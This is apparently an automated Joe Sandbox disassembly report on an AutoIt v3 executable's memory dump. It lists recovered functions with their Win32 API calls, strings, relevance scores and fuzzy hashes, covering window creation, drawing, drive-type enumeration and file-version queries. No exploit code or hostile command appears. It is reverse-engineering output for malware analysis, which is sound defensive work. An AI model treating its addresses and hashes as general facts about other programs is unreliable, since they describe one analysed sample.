CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 005F7D6D
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 005F7D7C
GetStockObject.GDI32(00000011), ref: 005F7D8C
SelectObject.GDI32(00000000,00000000), ref: 005F7D90
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 005F7DA0
GetDeviceCaps.GDI32(00000000,0000005A), ref: 005F7DA9
DeleteDC.GDI32(00000000), ref: 005F7DB2
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 005F7DDE
SendMessageW.USER32(00000030,00000000,00000001), ref: 005F7DF5
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 005F7E30
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 005F7E44
SendMessageW.USER32(00000404,00000001,00000000), ref: 005F7E55
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 005F7E85
GetStockObject.GDI32(00000011), ref: 005F7E90
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 005F7E9B
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 005F7EA5

Strings

static, xrefs: 005F7D67, 005F7E7F
DISPLAY, xrefs: 005F7D72
AutoIt v3, xrefs: 005F7D15
msctls_progress32, xrefs: 005F7E26

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: b8b7656b789a6818f4d2508bef6782563a0cb795e736afa7b0e6cfc9ab1e203c
Instruction ID: 8198764a92790874d3a7a762040f4044a0222c99a097d843947ee63e473a43d8
Opcode Fuzzy Hash: b8b7656b789a6818f4d2508bef6782563a0cb795e736afa7b0e6cfc9ab1e203c
Instruction Fuzzy Hash: 4DA183B1600619BFEB14DB64DC4AFAF7B7AEB49710F048115FA14A72E0D7B4AD40CB60

Function 005EB353 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 005EB361
GetDriveTypeW.KERNEL32(?,00612C4C,?,\\.\,00610980), ref: 005EB43E
SetErrorMode.KERNEL32(00000000,00612C4C,?,\\.\,00610980), ref: 005EB59C

Strings

SSD, xrefs: 005EB4C9
1394, xrefs: 005EB51E
Removable, xrefs: 005EB490
iSCSI, xrefs: 005EB541
SAS, xrefs: 005EB548
SCSI, xrefs: 005EB509
ATAPI, xrefs: 005EB510
Virtual, xrefs: 005EB564
RAMDisk, xrefs: 005EB468
MMC, xrefs: 005EB55D
CDROM, xrefs: 005EB472
Fixed, xrefs: 005EB486
FileBackedVirtual, xrefs: 005EB56B
Unknown, xrefs: 005EB45E, 005EB502
\\.\, xrefs: 005EB3B3
Network, xrefs: 005EB47C
SATA, xrefs: 005EB54F
ATA, xrefs: 005EB517
Fibre, xrefs: 005EB52C
PhysicalDrive, xrefs: 005EB3EA
SSA, xrefs: 005EB525
USB, xrefs: 005EB533
RAID, xrefs: 005EB53A

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: f181ff32cabf5e72c6a4e4f772f7d25ad4ba12dacb13714acd38d4e06c60873c
Instruction ID: 73d8954e8dec4b8d0086273782129cd77edf46654fad0a4492fc734d249e83b0
Opcode Fuzzy Hash: f181ff32cabf5e72c6a4e4f772f7d25ad4ba12dacb13714acd38d4e06c60873c
Instruction Fuzzy Hash: A951C531B4025BDB9B08DB22C98697E7FB2FB84302B244417F582A7291F771AE41CB85

Function 0060A041 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 0060A0F7
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0060A1B0
SendMessageW.USER32(?,00001102,00000002,?), ref: 0060A1CC

Strings

0, xrefs: 0060A209

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: e4db2f399fb25a9593190394884b3a57a20482f6da0aa117f657718697c54df5
Instruction ID: 6007be9996a435b81baea8a0d8bad59851702e5eb4bce017ad305fdafcc599c7
Opcode Fuzzy Hash: e4db2f399fb25a9593190394884b3a57a20482f6da0aa117f657718697c54df5
Instruction Fuzzy Hash: C402CB30148301AFEB19CF54C848BEBBBE6FB85394F08862DF995963E1C7759941CB92

Function 0060AF18 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0060AF51
SetTextColor.GDI32(?,?), ref: 0060AF55
GetSysColorBrush.USER32(0000000F), ref: 0060AF6B
GetSysColor.USER32(0000000F), ref: 0060AF76
CreateSolidBrush.GDI32(?), ref: 0060AF7B
GetSysColor.USER32(00000011), ref: 0060AF93
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0060AFA1
SelectObject.GDI32(?,00000000), ref: 0060AFB2
SetBkColor.GDI32(?,00000000), ref: 0060AFBB
SelectObject.GDI32(?,?), ref: 0060AFC8
InflateRect.USER32(?,000000FF,000000FF), ref: 0060AFE7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0060AFFE
GetWindowLongW.USER32(00000000,000000F0), ref: 0060B013
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0060B05F
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0060B086
InflateRect.USER32(?,000000FD,000000FD), ref: 0060B0A4
DrawFocusRect.USER32(?,?), ref: 0060B0AF
GetSysColor.USER32(00000011), ref: 0060B0BD
SetTextColor.GDI32(?,00000000), ref: 0060B0C5
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0060B0D9
SelectObject.GDI32(?,0060AC1F), ref: 0060B0F0
DeleteObject.GDI32(?), ref: 0060B0FB
SelectObject.GDI32(?,?), ref: 0060B101
DeleteObject.GDI32(?), ref: 0060B106
SetTextColor.GDI32(?,?), ref: 0060B10C
SetBkColor.GDI32(?,?), ref: 0060B116

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: c20cabb73f75015ab460646e618150ba58764708453102a68f9cd0bb975f8f63
Instruction ID: abe3e8f7dcb1cc7a59224b351d09b4a8fbf0b608dbeb80d5013a7b3c484a65eb
Opcode Fuzzy Hash: c20cabb73f75015ab460646e618150ba58764708453102a68f9cd0bb975f8f63
Instruction Fuzzy Hash: A5617C71900218BFEF159FA4DC49AEE7B7AEF08320F149116F915AB2E1D7B59980CF90

Function 00608FFA Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 006090EA
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006090FB
CharNextW.USER32(0000014E), ref: 0060912A
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0060916B
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00609181
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00609192
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 006091AF
SetWindowTextW.USER32(?,0000014E), ref: 006091FB
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00609211
SendMessageW.USER32(?,00001002,00000000,?), ref: 00609242
_memset.LIBCMT ref: 00609267
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 006092B0
_memset.LIBCMT ref: 0060930F
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00609339
SendMessageW.USER32(?,00001074,?,00000001), ref: 00609391
SendMessageW.USER32(?,0000133D,?,?), ref: 0060943E
InvalidateRect.USER32(?,00000000,00000001), ref: 00609460
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006094AA
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006094D7
DrawMenuBar.USER32(?), ref: 006094E6
SetWindowTextW.USER32(?,0000014E), ref: 0060950E

Strings

0, xrefs: 00609478

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 55486ed03076fc9b6e7052e1ec4700ffb96307bf64f41be0965216765bcf7554
Instruction ID: 2f77cc18296ad65ac8cdd85bc80db7bae4958fa4db72f3c969e11073a611a419
Opcode Fuzzy Hash: 55486ed03076fc9b6e7052e1ec4700ffb96307bf64f41be0965216765bcf7554
Instruction Fuzzy Hash: 9BE17C70940209AEDF259F55CC88EEF7BBBEF06710F10815AF915AA2D2D7708A81DF60

Function 00604ECC Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00605007
GetDesktopWindow.USER32 ref: 0060501C
GetWindowRect.USER32(00000000), ref: 00605023
GetWindowLongW.USER32(?,000000F0), ref: 00605085
DestroyWindow.USER32(?), ref: 006050B1
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 006050DA
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006050F8
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0060511E
SendMessageW.USER32(?,00000421,?,?), ref: 00605133
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00605146
IsWindowVisible.USER32(?), ref: 00605166
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00605181
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00605195
GetWindowRect.USER32(?,?), ref: 006051AD
MonitorFromPoint.USER32(?,?,00000002), ref: 006051D3
GetMonitorInfoW.USER32(00000000,?), ref: 006051ED
CopyRect.USER32(?,?), ref: 00605204
SendMessageW.USER32(?,00000412,00000000), ref: 0060526F

Strings

(, xrefs: 006051E0
0, xrefs: 00604FB2
tooltips_class32, xrefs: 006050D3

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: c30a82fbd048329598cf497cda5863170f9f9eef05f73d5fbe38f80ffb7d94b5
Instruction ID: ce47258c6575545bc35e91b98dc5e10127669fe15b1dee7294a89157346a6bbf
Opcode Fuzzy Hash: c30a82fbd048329598cf497cda5863170f9f9eef05f73d5fbe38f80ffb7d94b5
Instruction Fuzzy Hash: 49B16C71604741AFDB04DF64C948B9BBBE6BF88310F00891DF99AAB291DB71E845CF91

Function 005E498A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 005E499C
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 005E49C2
_wcscpy.LIBCMT ref: 005E49F0
_wcscmp.LIBCMT ref: 005E49FB
_wcscat.LIBCMT ref: 005E4A11
_wcsstr.LIBCMT ref: 005E4A1C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 005E4A38
_wcscat.LIBCMT ref: 005E4A81
_wcscat.LIBCMT ref: 005E4A88
_wcsncpy.LIBCMT ref: 005E4AB3

Strings

StringFileInfo\, xrefs: 005E4A0B
DefaultLangCodepage, xrefs: 005E4A9B
\VarFileInfo\Translation, xrefs: 005E4A30
04090000, xrefs: 005E4A6E
%u.%u.%u.%u, xrefs: 005E4B16

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 6539a8be056ef7dd7818fdccc4367e8d91a48308e3dff44ab8bc8d4a34a777e4
Instruction ID: 1c2b302a96baf4333d5ae21d782978c3c5deea635a6ae8cbf00a7667a79dbe71
Opcode Fuzzy Hash: 6539a8be056ef7dd7818fdccc4367e8d91a48308e3dff44ab8bc8d4a34a777e4
Instruction Fuzzy Hash: 4B4127729002467BEB14A7658C0BEBF7FADFF82320F044055FA04A6192EB74DA419BA5

Function 00582BA9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00582C8C
GetSystemMetrics.USER32(00000007), ref: 00582C94
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00582CBF
GetSystemMetrics.USER32(00000008), ref: 00582CC7
GetSystemMetrics.USER32(00000004), ref: 00582CEC
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00582D09
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00582D19
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00582D4C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00582D60
GetClientRect.USER32(00000000,000000FF), ref: 00582D7E
GetStockObject.GDI32(00000011), ref: 00582D9A
SendMessageW.USER32(00000000,00000030,00000000), ref: 00582DA5

Part of subcall function 00582714: GetCursorPos.USER32(?), ref: 00582727
Part of subcall function 00582714: ScreenToClient.USER32(006477B0,?), ref: 00582744
Part of subcall function 00582714: GetAsyncKeyState.USER32(00000001), ref: 00582769
Part of subcall function 00582714: GetAsyncKeyState.USER32(00000002), ref: 00582777

SetTimer.USER32(00000000,00000000,00000028,005813C7), ref: 00582DCC

Strings

AutoIt v3 GUI, xrefs: 00582D44
ha, xrefs: 00582BEC, 005BC433

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI$ha
API String ID: 1458621304-1692651625
Opcode ID: 0488aa51d5c2a4aa2921f173b76cf42cffd344c1cc481335f6d169e7b5460418
Instruction ID: 86929c770c37ad93e49256d665d760cb69b239a94ecce550389dbf642080a13b
Opcode Fuzzy Hash: 0488aa51d5c2a4aa2921f173b76cf42cffd344c1cc481335f6d169e7b5460418
Instruction Fuzzy Hash: 7BB17B7460020AAFDF14EFA8DD49BEE7FB6FB48311F108529FA15A7290DB70A940CB54

Function 005A0429 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 349COMMON

Download Yara Rule

APIs

Part of subcall function 00591821: _memmove.LIBCMT ref: 0059185B

GetForegroundWindow.USER32(00610980,?,?,?,?,?), ref: 005A04E3
IsWindow.USER32(?), ref: 005D66BB

Strings

TITLE, xrefs: 005D6650
CLASS, xrefs: 005D64E5
ACTIVE, xrefs: 005D6488
INSTANCE, xrefs: 005D65FA
HANDLE, xrefs: 005D649E
ALL, xrefs: 005D6622
LAST, xrefs: 005D6472
REGEXPCLASS, xrefs: 005D6506
REGEXPTITLE, xrefs: 005D64B4

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Window$Foreground_memmove
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 3828923867-1919597938
Opcode ID: e074be120cc017f9b70ee11a951078127b4b81c293599c3eee21e988d0f6dbed
Instruction ID: 77713974abf173500f7979a1002f413f90b31c67eee0f99cd2255197065b2123
Opcode Fuzzy Hash: e074be120cc017f9b70ee11a951078127b4b81c293599c3eee21e988d0f6dbed
Instruction Fuzzy Hash: A9D1C130104607DBCB14EF64C4859AEBFB5FF95344F104A1BF496872A2DB30E99ACB92

Function 0060441F Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 006044AC
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 0060456C

Strings

GETSELECTED, xrefs: 0060469A
FINDITEM, xrefs: 006046DF
ISSELECTED, xrefs: 00604577
GETSELECTEDCOUNT, xrefs: 0060454F
SELECT, xrefs: 00604606
VIEWCHANGE, xrefs: 0060472B
SELECTALL, xrefs: 006045D3
SELECTCLEAR, xrefs: 006045EB
GETITEMCOUNT, xrefs: 006044DE
GETSUBITEMCOUNT, xrefs: 006044F7
GETTEXT, xrefs: 00604515
SELECTINVERT, xrefs: 0060463C
DESELECT, xrefs: 0060465A

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 3e235d9b43a01089b5be5a93d50db0f520552f00bc5259eda62ee2a0b7f4e615
Instruction ID: a7cd470e3792ab499e7859e1d07ba997ea0b3c1e9752ecccb15ade69129d5722
Opcode Fuzzy Hash: 3e235d9b43a01089b5be5a93d50db0f520552f00bc5259eda62ee2a0b7f4e615
Instruction Fuzzy Hash: C8A180702542029FCB28EF14C855A6A7BE6FF85314F104929F956AB3D2EF31EC05CB91

Function 005F56C8 Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 005F56E1
LoadCursorW.USER32(00000000,00007F8A), ref: 005F56EC
LoadCursorW.USER32(00000000,00007F00), ref: 005F56F7
LoadCursorW.USER32(00000000,00007F03), ref: 005F5702
LoadCursorW.USER32(00000000,00007F8B), ref: 005F570D
LoadCursorW.USER32(00000000,00007F01), ref: 005F5718
LoadCursorW.USER32(00000000,00007F81), ref: 005F5723
LoadCursorW.USER32(00000000,00007F88), ref: 005F572E
LoadCursorW.USER32(00000000,00007F80), ref: 005F5739
LoadCursorW.USER32(00000000,00007F86), ref: 005F5744
LoadCursorW.USER32(00000000,00007F83), ref: 005F574F
LoadCursorW.USER32(00000000,00007F85), ref: 005F575A
LoadCursorW.USER32(00000000,00007F82), ref: 005F5765
LoadCursorW.USER32(00000000,00007F84), ref: 005F5770
LoadCursorW.USER32(00000000,00007F04), ref: 005F577B
LoadCursorW.USER32(00000000,00007F02), ref: 005F5786
GetCursorInfo.USER32(?), ref: 005F5796
GetLastError.KERNEL32(00000001,00000000), ref: 005F57C1

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 782268be78d12c349237fb9befa5a535a534be02ebf9a2a47852f0a642a5b158
Instruction ID: f02f294b25aba71a1dc8bcabc9fa9150ce740cd10958b9037feb16db1449dac7
Opcode Fuzzy Hash: 782268be78d12c349237fb9befa5a535a534be02ebf9a2a47852f0a642a5b158
Instruction Fuzzy Hash: CD415470E04319AADB109FBA8C49D6EFEF8EF51B50B10452FE619E7290DAB8A400CF51

Function 005DB13A Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 005DB17B
__swprintf.LIBCMT ref: 005DB21C
_wcscmp.LIBCMT ref: 005DB22F
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 005DB284
_wcscmp.LIBCMT ref: 005DB2C0
GetClassNameW.USER32(?,?,00000400), ref: 005DB2F7
GetDlgCtrlID.USER32(?), ref: 005DB349
GetWindowRect.USER32(?,?), ref: 005DB37F
GetParent.USER32(?), ref: 005DB39D
ScreenToClient.USER32(00000000), ref: 005DB3A4
GetClassNameW.USER32(?,?,00000100), ref: 005DB41E
_wcscmp.LIBCMT ref: 005DB432
GetWindowTextW.USER32(?,?,00000400), ref: 005DB458
_wcscmp.LIBCMT ref: 005DB46C

Part of subcall function 005A385C: _iswctype.LIBCMT ref: 005A3864

Strings

%s%u, xrefs: 005DB216

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: ab404ef258efc65859cd689c2653f2190b0b9b73035e5e66f25d0dc4ea547cf8
Instruction ID: dd6278b3d5de7fda26d3fae970e431a6db487f9ba191e6c3e7f15f75d3aa75bf
Opcode Fuzzy Hash: ab404ef258efc65859cd689c2653f2190b0b9b73035e5e66f25d0dc4ea547cf8
